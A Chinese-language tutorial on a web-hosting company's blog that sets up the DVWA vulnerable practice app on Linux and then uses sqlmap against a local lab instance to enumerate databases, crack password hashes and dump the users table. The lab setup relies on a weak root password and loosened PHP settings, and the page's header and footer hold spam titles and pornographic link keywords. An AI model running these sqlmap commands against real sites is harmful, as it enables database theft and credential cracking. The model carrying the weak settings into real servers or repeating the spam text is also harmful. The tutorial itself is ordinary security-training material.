老熟女激烈的高潮_日韩一级黄色录像_亚洲1区2区3区视频_精品少妇一区二区三区在线播放_国产欧美日产久久_午夜福利精品导航凹凸

重慶分公司,新征程啟航

為企業提供網站建設、域名注冊、服務器等服務

測試演練系統DVWA流程

下文內容主要給大家帶來測試演練系統DVWA流程,這里所講到的知識,與書籍略有不同,都是創新互聯專業技術人員在與用戶接觸過程中,總結出來的,具有一定的經驗分享價值,希望給廣大讀者帶來幫助。

創新互聯建站主要從事成都網站設計、成都網站建設、外貿網站建設、網頁設計、企業做網站、公司建網站等業務。立足成都服務唐山,10年網站建設經驗,價格優惠、服務專業,歡迎來電咨詢建站服務:18982081108

一、部署***測試演練系統DVWA


1. 下載DVWA軟件包

    官方下載地址:http://www.dvwa.co.uk/,當前最新版本為:DVWA-1.9

    wgethttps://codeload.github.com/ethicalhack3r/DVWA/zip/master


2. 部署linux環境

    yum install -y httpd MySQL mysql-server php php-mysql php-gd


3. 開啟httpd和mysqld服務

    service httpd start

    service mysqld start

測試演練系統DVWA流程

4. 測試htttp對php的解析,瀏覽器訪問http://ip/test.php正常

    vim /var/www/html/test.php

    寫入:

   

     phpinfo();

   ?>


5. 修改mysql的密碼

     mysqladmin -uroot password "123456"


6. 將DVWA-1.9.zip解壓至/var/www/html,并修改屬主為apache

     unzip DVWA-1.9.zip -d /var/www/html

    chown -R apache:apache /var/www/html/DVWA-1.9


7. 修改DVWA配置文件數據庫密碼為123456

    vim /var/www/html/DVWA-1.9/config/config.inc.php

    修改密碼:

    $_DVWA[ 'db_password' ] = '123456';

 測試演練系統DVWA流程

8. 進入DVWA的web安裝界面,http://ip/DVWA-1.9/setup.php,發現報錯    

 測試演練系統DVWA流程

   解決方法:

   1)編輯php的配置文件 vim /etc/php.ini

        allow_url_include = On

 測試演練系統DVWA流程

   2)編輯DVWA配置文件 vim /var/www/html/DVWA-1.9/config/config.inc.php

        找到創建公鑰和私鑰的鏈接:https://www.google.com/recaptcha/admin/create申請后填寫在配置文件中:

       公鑰:6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb

                  私鑰:6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k

 測試演練系統DVWA流程

測試演練系統DVWA流程

測試演練系統DVWA流程

    

9. 重啟http,使修改的配置文件生效,刷新web界面,錯誤消除

    service httpd restart

 測試演練系統DVWA流程

10. 點擊Create/Reset Database,自動跳轉到登錄界面,默認用戶名/密碼:admin/password

      至此,DVWA已部署完成

      測試演練系統DVWA流程

二、安裝SQLmap漏洞查看工具

 

1. 官方下載:http://sqlmap.org/http://sqlmap.org/

     版本:sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz


2.  解壓sqlmap,并執行

     說明:該工具是用python寫的,需安裝python,它不是編譯型語言,而是執行性語言,直接運行

     測試演練系統DVWA流程

      命令 tar -zxvf  sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

      命令 ./sqlmap.py

      測試演練系統DVWA流程

3. 設置命令別名,修改vim /etc/profile,直接使用sqlmap命令

     命令 alias sqlmap='python /usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'

     命令 source /etc/profile  

      測試演練系統DVWA流程

三、實戰

        實戰1:枚舉登錄MYSQL數據的用戶名與密碼

        實戰2:枚舉所有數據庫

        實戰3:枚舉指定數據庫的數據表

        實戰4:獲取指定數據庫和表中所有列的信息

        實戰5:枚舉指定數據表中的所有用戶名與密碼


       環境準備:

       1)登錄http://192.168.1.124/DVWA-1.9,將安全級別設置為最低;


       2)開啟Firefox瀏覽器TamperData插件,等待獲取cookies值;


       3)在【SQL Injection】項中,提交User ID為22(地址欄出現id=22,這就是MySQL的注入點)

             獲得注入點:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#

       4)TamperData彈窗獲取cookies值:security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552


        

測試演練系統DVWA流程

測試演練系統DVWA流程

實戰1:枚舉登錄MYSQL數據的用戶名與密碼

   sqlmap語法參數:

  • -u :指定目標URL,即注入點

  • --cookies:當前會話的cookies值

  • -b:獲取數據庫類型,檢索數據庫管理系統標識

  • --current-db:獲取當前數據庫

  • --current-user:獲取當前登錄數據庫使用的用戶


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' -b  --current-db  --current-user


說明:根據提示回復Y,繼續


測試演練系統DVWA流程

結果:得到當前數據庫為dawa,使用的用戶為root@localhost


測試演練系統DVWA流程

實戰2:枚舉所有數據庫

   sqlmap語法參數:

  • --users:枚舉數據庫用戶名

  • -password:枚舉數據庫用戶的密碼(hash)

   

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" --users --password

測試演練系統DVWA流程

說明:選擇目錄下字典文件,暴力破解


測試演練系統DVWA流程

結果:數據庫用戶名為root,密碼也有明文形式123456


測試演練系統DVWA流程

實戰3:枚舉數據庫和指定數據庫的數據表

   sqlmap語法參數:

  • --dbs:枚舉當前數據庫


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" --dbs


結果:mysql下所有的數據庫

測試演練系統DVWA流程

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa --tables


結果:dvwa庫中,所有的表

測試演練系統DVWA流程

實戰4:獲取指定數據庫和表中所有列的信息

   sqlmap語法參數:

  • -D:指定的數據庫

  • -T:指定數據庫中的數據表

  • --columns:獲取列的信息


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa -T users --columns


結果:dvwa庫,users表中所有字段信息

測試演練系統DVWA流程

實戰5:枚舉指定數據表中的所有用戶名與密碼

   sqlmap語法參數:

  • -C:枚舉數據表中的列

  • --dump:存儲數據表項


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump


結果:dvwa庫,users表中user字段和password字段信息,最后表中信息轉存文件中

測試演練系統DVWA流程

對于以上關于測試演練系統DVWA流程,如果大家還有更多需要了解的可以持續關注我們創新互聯的行業推新,如需獲取專業解答,可在官網聯系售前售后的,希望該文章可給大家帶來一定的知識更新。

 

 


文章標題:測試演練系統DVWA流程
當前網址:http://www.xueling.net.cn/article/pochph.html

其他資訊

在線咨詢
服務熱線
服務熱線:028-86922220
TOP
主站蜘蛛池模板: 激情91| 91在线观 | 欧美另类videosbestsex牲 | 欧美在线一二三四 | 日本japanesexxxx高潮| 樱花视频在线观看进击的巨人第三季 | 亚洲黄色片网站 | 精品无码人妻一区二区三区 | 国产精品素人一区二区 | 亚洲AV噜噜狠狠网址蜜桃 | 91最新在线观看 | 狠狠躁夜夜躁人人爽天天2020 | 国产精品一级无遮挡毛片 | 亚洲伊人久久大香线蕉 | 欧美黑人狂躁日本寡妇 | 四虎成人永久在线精品免费 | 日韩欧美色图 | av黄色成人 | 6699嫩草久久久精品影院 | BBWBBWBBW少妇毛茸茸 | 国产福利三区 | 午夜福利妺妺嘿嘿影视 | 国产精品影视在线观看 | 欧美大片视频在线观看免费视频 | 内插射精大群交在线 | 伊人久久精品亚洲午夜 | 国产精品国产三级国产专播一 | 精品www日韩熟女人妻 | 亚洲第一在线综合网站 | 黄站在线观看 | 妺妺窝人体色www在线图片 | 最近新中文字幕大全高清 | 久久黄色一级视频 | 欧美久久影院 | 精品欧美日韩国产日漫一区不卡 | 日本少妇被黑人猛cao | 亚洲视频1区2区3区4区 | 国产精品久久久久久久久免费高清 | 亚洲第一页在线 | 无码99久热这里只有精品视频在线 | 91日韩精品久久久久身材苗条 |